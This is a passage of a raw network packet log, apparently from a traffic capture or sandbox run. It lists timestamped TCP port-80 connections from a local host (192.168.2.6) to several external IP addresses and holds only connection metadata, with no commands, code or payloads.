                                                                                  Nov 20, 2024 08:32:19.344187021 CET8049990163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:19.344199896 CET8049990163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:19.344216108 CET4999080192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:19.344257116 CET4999080192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:19.348954916 CET8049990163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:19.349023104 CET8049990163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:19.349035025 CET8049990163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:19.349081993 CET4999080192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:19.389684916 CET4999080192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:19.515652895 CET8049990163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:19.515671968 CET8049990163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:19.515682936 CET8049990163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:19.515836000 CET4999080192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:19.515853882 CET8049990163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:19.515911102 CET4999080192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:19.515912056 CET8049990163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:19.516088009 CET8049990163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:19.516144991 CET4999080192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:20.077308893 CET4999080192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:21.095530033 CET4999180192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:21.100464106 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:21.100558043 CET4999180192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:21.122011900 CET4999180192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:21.127702951 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:21.919670105 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:21.919878006 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:21.919886112 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:21.919893026 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:21.919899940 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:21.919914961 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:21.919928074 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:21.920061111 CET4999180192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:21.920061111 CET4999180192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:21.920092106 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:21.920137882 CET4999180192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:21.921544075 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:21.921623945 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:21.921669006 CET4999180192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:21.924953938 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:21.925009012 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:21.925020933 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:21.925055981 CET4999180192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:21.925081968 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:21.925126076 CET4999180192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:22.089765072 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:22.089814901 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:22.089828014 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:22.089940071 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:22.090020895 CET4999180192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:22.090020895 CET4999180192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:22.090065002 CET8049991163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:22.090111971 CET4999180192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:22.624289989 CET4999180192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:23.642527103 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:23.647511959 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:23.647598028 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:23.665066004 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:23.669949055 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:23.670093060 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.442312956 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.442328930 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.442339897 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.442435026 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.442446947 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.442456961 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.442467928 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.442540884 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:24.442540884 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:24.442540884 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:24.442667961 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.442677975 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.442694902 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.442709923 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:24.442739964 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:24.447444916 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.447500944 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.447513103 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.447556973 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:24.612636089 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.612665892 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.612678051 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.612705946 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:24.612768888 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.612806082 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:24.612845898 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.612911940 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.612950087 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:24.613117933 CET8049992163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:24.613169909 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:25.172858000 CET4999280192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:26.190982103 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:26.196008921 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.196130037 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:26.207138062 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:26.211970091 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.991022110 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.991189003 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.991261005 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.991271019 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.991332054 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.991328955 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:26.991343021 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.991425991 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.991435051 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.991446018 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.991476059 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:26.991514921 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.991542101 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:26.991564035 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:26.996211052 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.996239901 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.996252060 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.996304989 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:26.996342897 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:26.996433020 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:27.078696012 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:27.078706026 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:27.078825951 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:27.168257952 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:27.168327093 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:27.168339014 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:27.168418884 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:27.168431044 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:27.168521881 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:27.168629885 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:27.168663025 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:27.168687105 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:27.169718027 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:27.171123028 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:27.174806118 CET4999480192.168.2.6163.44.185.183
                                                                                  Nov 20, 2024 08:32:27.179651022 CET8049994163.44.185.183192.168.2.6
                                                                                  Nov 20, 2024 08:32:32.206209898 CET4999580192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:32.211191893 CET8049995172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:32.211278915 CET4999580192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:32.227000952 CET4999580192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:32.231976986 CET8049995172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:32.755002022 CET8049995172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:32.755700111 CET8049995172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:32.755875111 CET4999580192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:33.733607054 CET4999580192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:34.753415108 CET4999680192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:34.758642912 CET8049996172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:34.758951902 CET4999680192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:34.779586077 CET4999680192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:34.784558058 CET8049996172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:35.293843031 CET8049996172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:35.294502020 CET8049996172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:35.294691086 CET4999680192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:36.296108007 CET4999680192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:37.314274073 CET4999780192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:37.319607973 CET8049997172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:37.319736004 CET4999780192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:37.335365057 CET4999780192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:37.340274096 CET8049997172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:37.340394020 CET8049997172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:37.887171984 CET8049997172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:37.887877941 CET8049997172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:37.887957096 CET4999780192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:38.843122005 CET4999780192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:39.861325026 CET4999880192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:39.869014025 CET8049998172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:39.869101048 CET4999880192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:39.880542994 CET4999880192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:39.885920048 CET8049998172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:40.445230007 CET8049998172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:40.445550919 CET8049998172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:40.445647001 CET4999880192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:40.447767973 CET4999880192.168.2.6172.67.162.12
                                                                                  Nov 20, 2024 08:32:40.452708006 CET8049998172.67.162.12192.168.2.6
                                                                                  Nov 20, 2024 08:32:45.567159891 CET4999980192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:45.572144032 CET804999985.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:45.572278976 CET4999980192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:45.587671041 CET4999980192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:45.592602968 CET804999985.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:47.094329119 CET4999980192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:47.099713087 CET804999985.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:47.099885941 CET4999980192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:48.114305973 CET5000080192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:48.119497061 CET805000085.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:48.119577885 CET5000080192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:48.138432026 CET5000080192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:48.143347979 CET805000085.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:49.639800072 CET5000080192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:49.645191908 CET805000085.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:49.645256996 CET5000080192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:50.659231901 CET5000280192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:50.664490938 CET805000285.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:50.671235085 CET5000280192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:50.683286905 CET5000280192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:50.688251019 CET805000285.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:50.688342094 CET805000285.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:52.186642885 CET5000280192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:52.191823959 CET805000285.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:52.191899061 CET5000280192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:53.206095934 CET5000380192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:53.211122990 CET805000385.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:53.211208105 CET5000380192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:53.221496105 CET5000380192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:53.230283976 CET805000385.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:53.922540903 CET805000385.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:53.922594070 CET805000385.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:53.922705889 CET5000380192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:53.972852945 CET5000380192.168.2.685.159.66.93
                                                                                  Nov 20, 2024 08:32:53.978199005 CET805000385.159.66.93192.168.2.6
                                                                                  Nov 20, 2024 08:32:59.026654959 CET5000480192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:32:59.031667948 CET8050004103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:32:59.031852007 CET5000480192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:32:59.045275927 CET5000480192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:32:59.050292969 CET8050004103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:32:59.965503931 CET8050004103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:32:59.965563059 CET8050004103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:32:59.965615988 CET5000480192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:00.546185970 CET5000480192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:01.567184925 CET5000580192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:01.572335958 CET8050005103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:33:01.575268030 CET5000580192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:01.591272116 CET5000580192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:01.596267939 CET8050005103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:33:02.486272097 CET8050005103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:33:02.486644983 CET8050005103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:33:02.486694098 CET5000580192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:03.095184088 CET5000580192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:04.112373114 CET5000680192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:04.117574930 CET8050006103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:33:04.117645979 CET5000680192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:04.136784077 CET5000680192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:04.141733885 CET8050006103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:33:04.141892910 CET8050006103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:33:05.035121918 CET8050006103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:33:05.035259962 CET8050006103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:33:05.036603928 CET5000680192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:05.640018940 CET5000680192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:06.659257889 CET5000780192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:06.665304899 CET8050007103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:33:06.671181917 CET5000780192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:06.679197073 CET5000780192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:06.684171915 CET8050007103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:33:07.596127033 CET8050007103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:33:07.596348047 CET8050007103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:33:07.603228092 CET5000780192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:07.603497982 CET5000780192.168.2.6103.21.221.4
                                                                                  Nov 20, 2024 08:33:07.608375072 CET8050007103.21.221.4192.168.2.6
                                                                                  Nov 20, 2024 08:33:12.645240068 CET5000880192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:12.650243044 CET8050008188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:33:12.655476093 CET5000880192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:12.709978104 CET5000880192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:12.714859962 CET8050008188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:33:13.288774014 CET8050008188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:33:13.288794994 CET8050008188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:33:13.289060116 CET5000880192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:13.289203882 CET8050008188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:33:13.291235924 CET5000880192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:14.217969894 CET5000880192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:15.236330986 CET5000980192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:15.241600990 CET8050009188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:33:15.242099047 CET5000980192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:15.255605936 CET5000980192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:15.260504961 CET8050009188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:33:15.886771917 CET8050009188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:33:15.886794090 CET8050009188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:33:15.886843920 CET5000980192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:15.887309074 CET8050009188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:33:15.887413979 CET5000980192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:16.767235994 CET5000980192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:17.784415007 CET5001080192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:17.789374113 CET8050010188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:33:17.789458036 CET5001080192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:17.809768915 CET5001080192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:17.814615011 CET8050010188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:33:17.814749002 CET8050010188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:33:18.423091888 CET8050010188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:33:18.423111916 CET8050010188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:33:18.423233032 CET5001080192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:18.423799038 CET8050010188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:33:18.423851013 CET5001080192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:19.311789989 CET5001080192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:20.332817078 CET5001180192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:20.337894917 CET8050011188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:33:20.337960005 CET5001180192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:20.356177092 CET5001180192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:20.361890078 CET8050011188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:33:20.999013901 CET8050011188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:33:20.999037027 CET8050011188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:33:20.999224901 CET8050011188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:33:20.999361038 CET5001180192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:20.999361038 CET5001180192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:21.002505064 CET5001180192.168.2.6188.114.96.3
                                                                                  Nov 20, 2024 08:33:21.007785082 CET8050011188.114.96.3192.168.2.6
                                                                                  Nov 20, 2024 08:33:26.050879002 CET5001480192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:26.055845022 CET805001466.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:26.055919886 CET5001480192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:26.071649075 CET5001480192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:26.076606035 CET805001466.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:26.642684937 CET805001466.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:26.642726898 CET805001466.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:26.642762899 CET805001466.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:26.642780066 CET5001480192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:26.642796040 CET805001466.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:26.642832994 CET805001466.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:26.642837048 CET5001480192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:26.642863989 CET805001466.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:26.642896891 CET805001466.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:26.642904997 CET5001480192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:26.642939091 CET5001480192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:27.577434063 CET5001480192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:28.596124887 CET5001580192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:28.601242065 CET805001566.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:28.601330042 CET5001580192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:28.617840052 CET5001580192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:28.622740030 CET805001566.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:29.217259884 CET805001566.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:29.217322111 CET805001566.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:29.217359066 CET805001566.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:29.217391968 CET805001566.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:29.217437029 CET5001580192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:29.217482090 CET805001566.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:29.217505932 CET5001580192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:29.217539072 CET805001566.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:29.217632055 CET5001580192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:30.124214888 CET5001580192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:31.145993948 CET5001680192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:31.151110888 CET805001666.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:31.151259899 CET5001680192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:31.169580936 CET5001680192.168.2.666.29.137.10
                                                                                  Nov 20, 2024 08:33:31.174590111 CET805001666.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:31.174649954 CET805001666.29.137.10192.168.2.6
                                                                                  Nov 20, 2024 08:33:31.752266884 CET805001666.29.137.10192.168.2.6
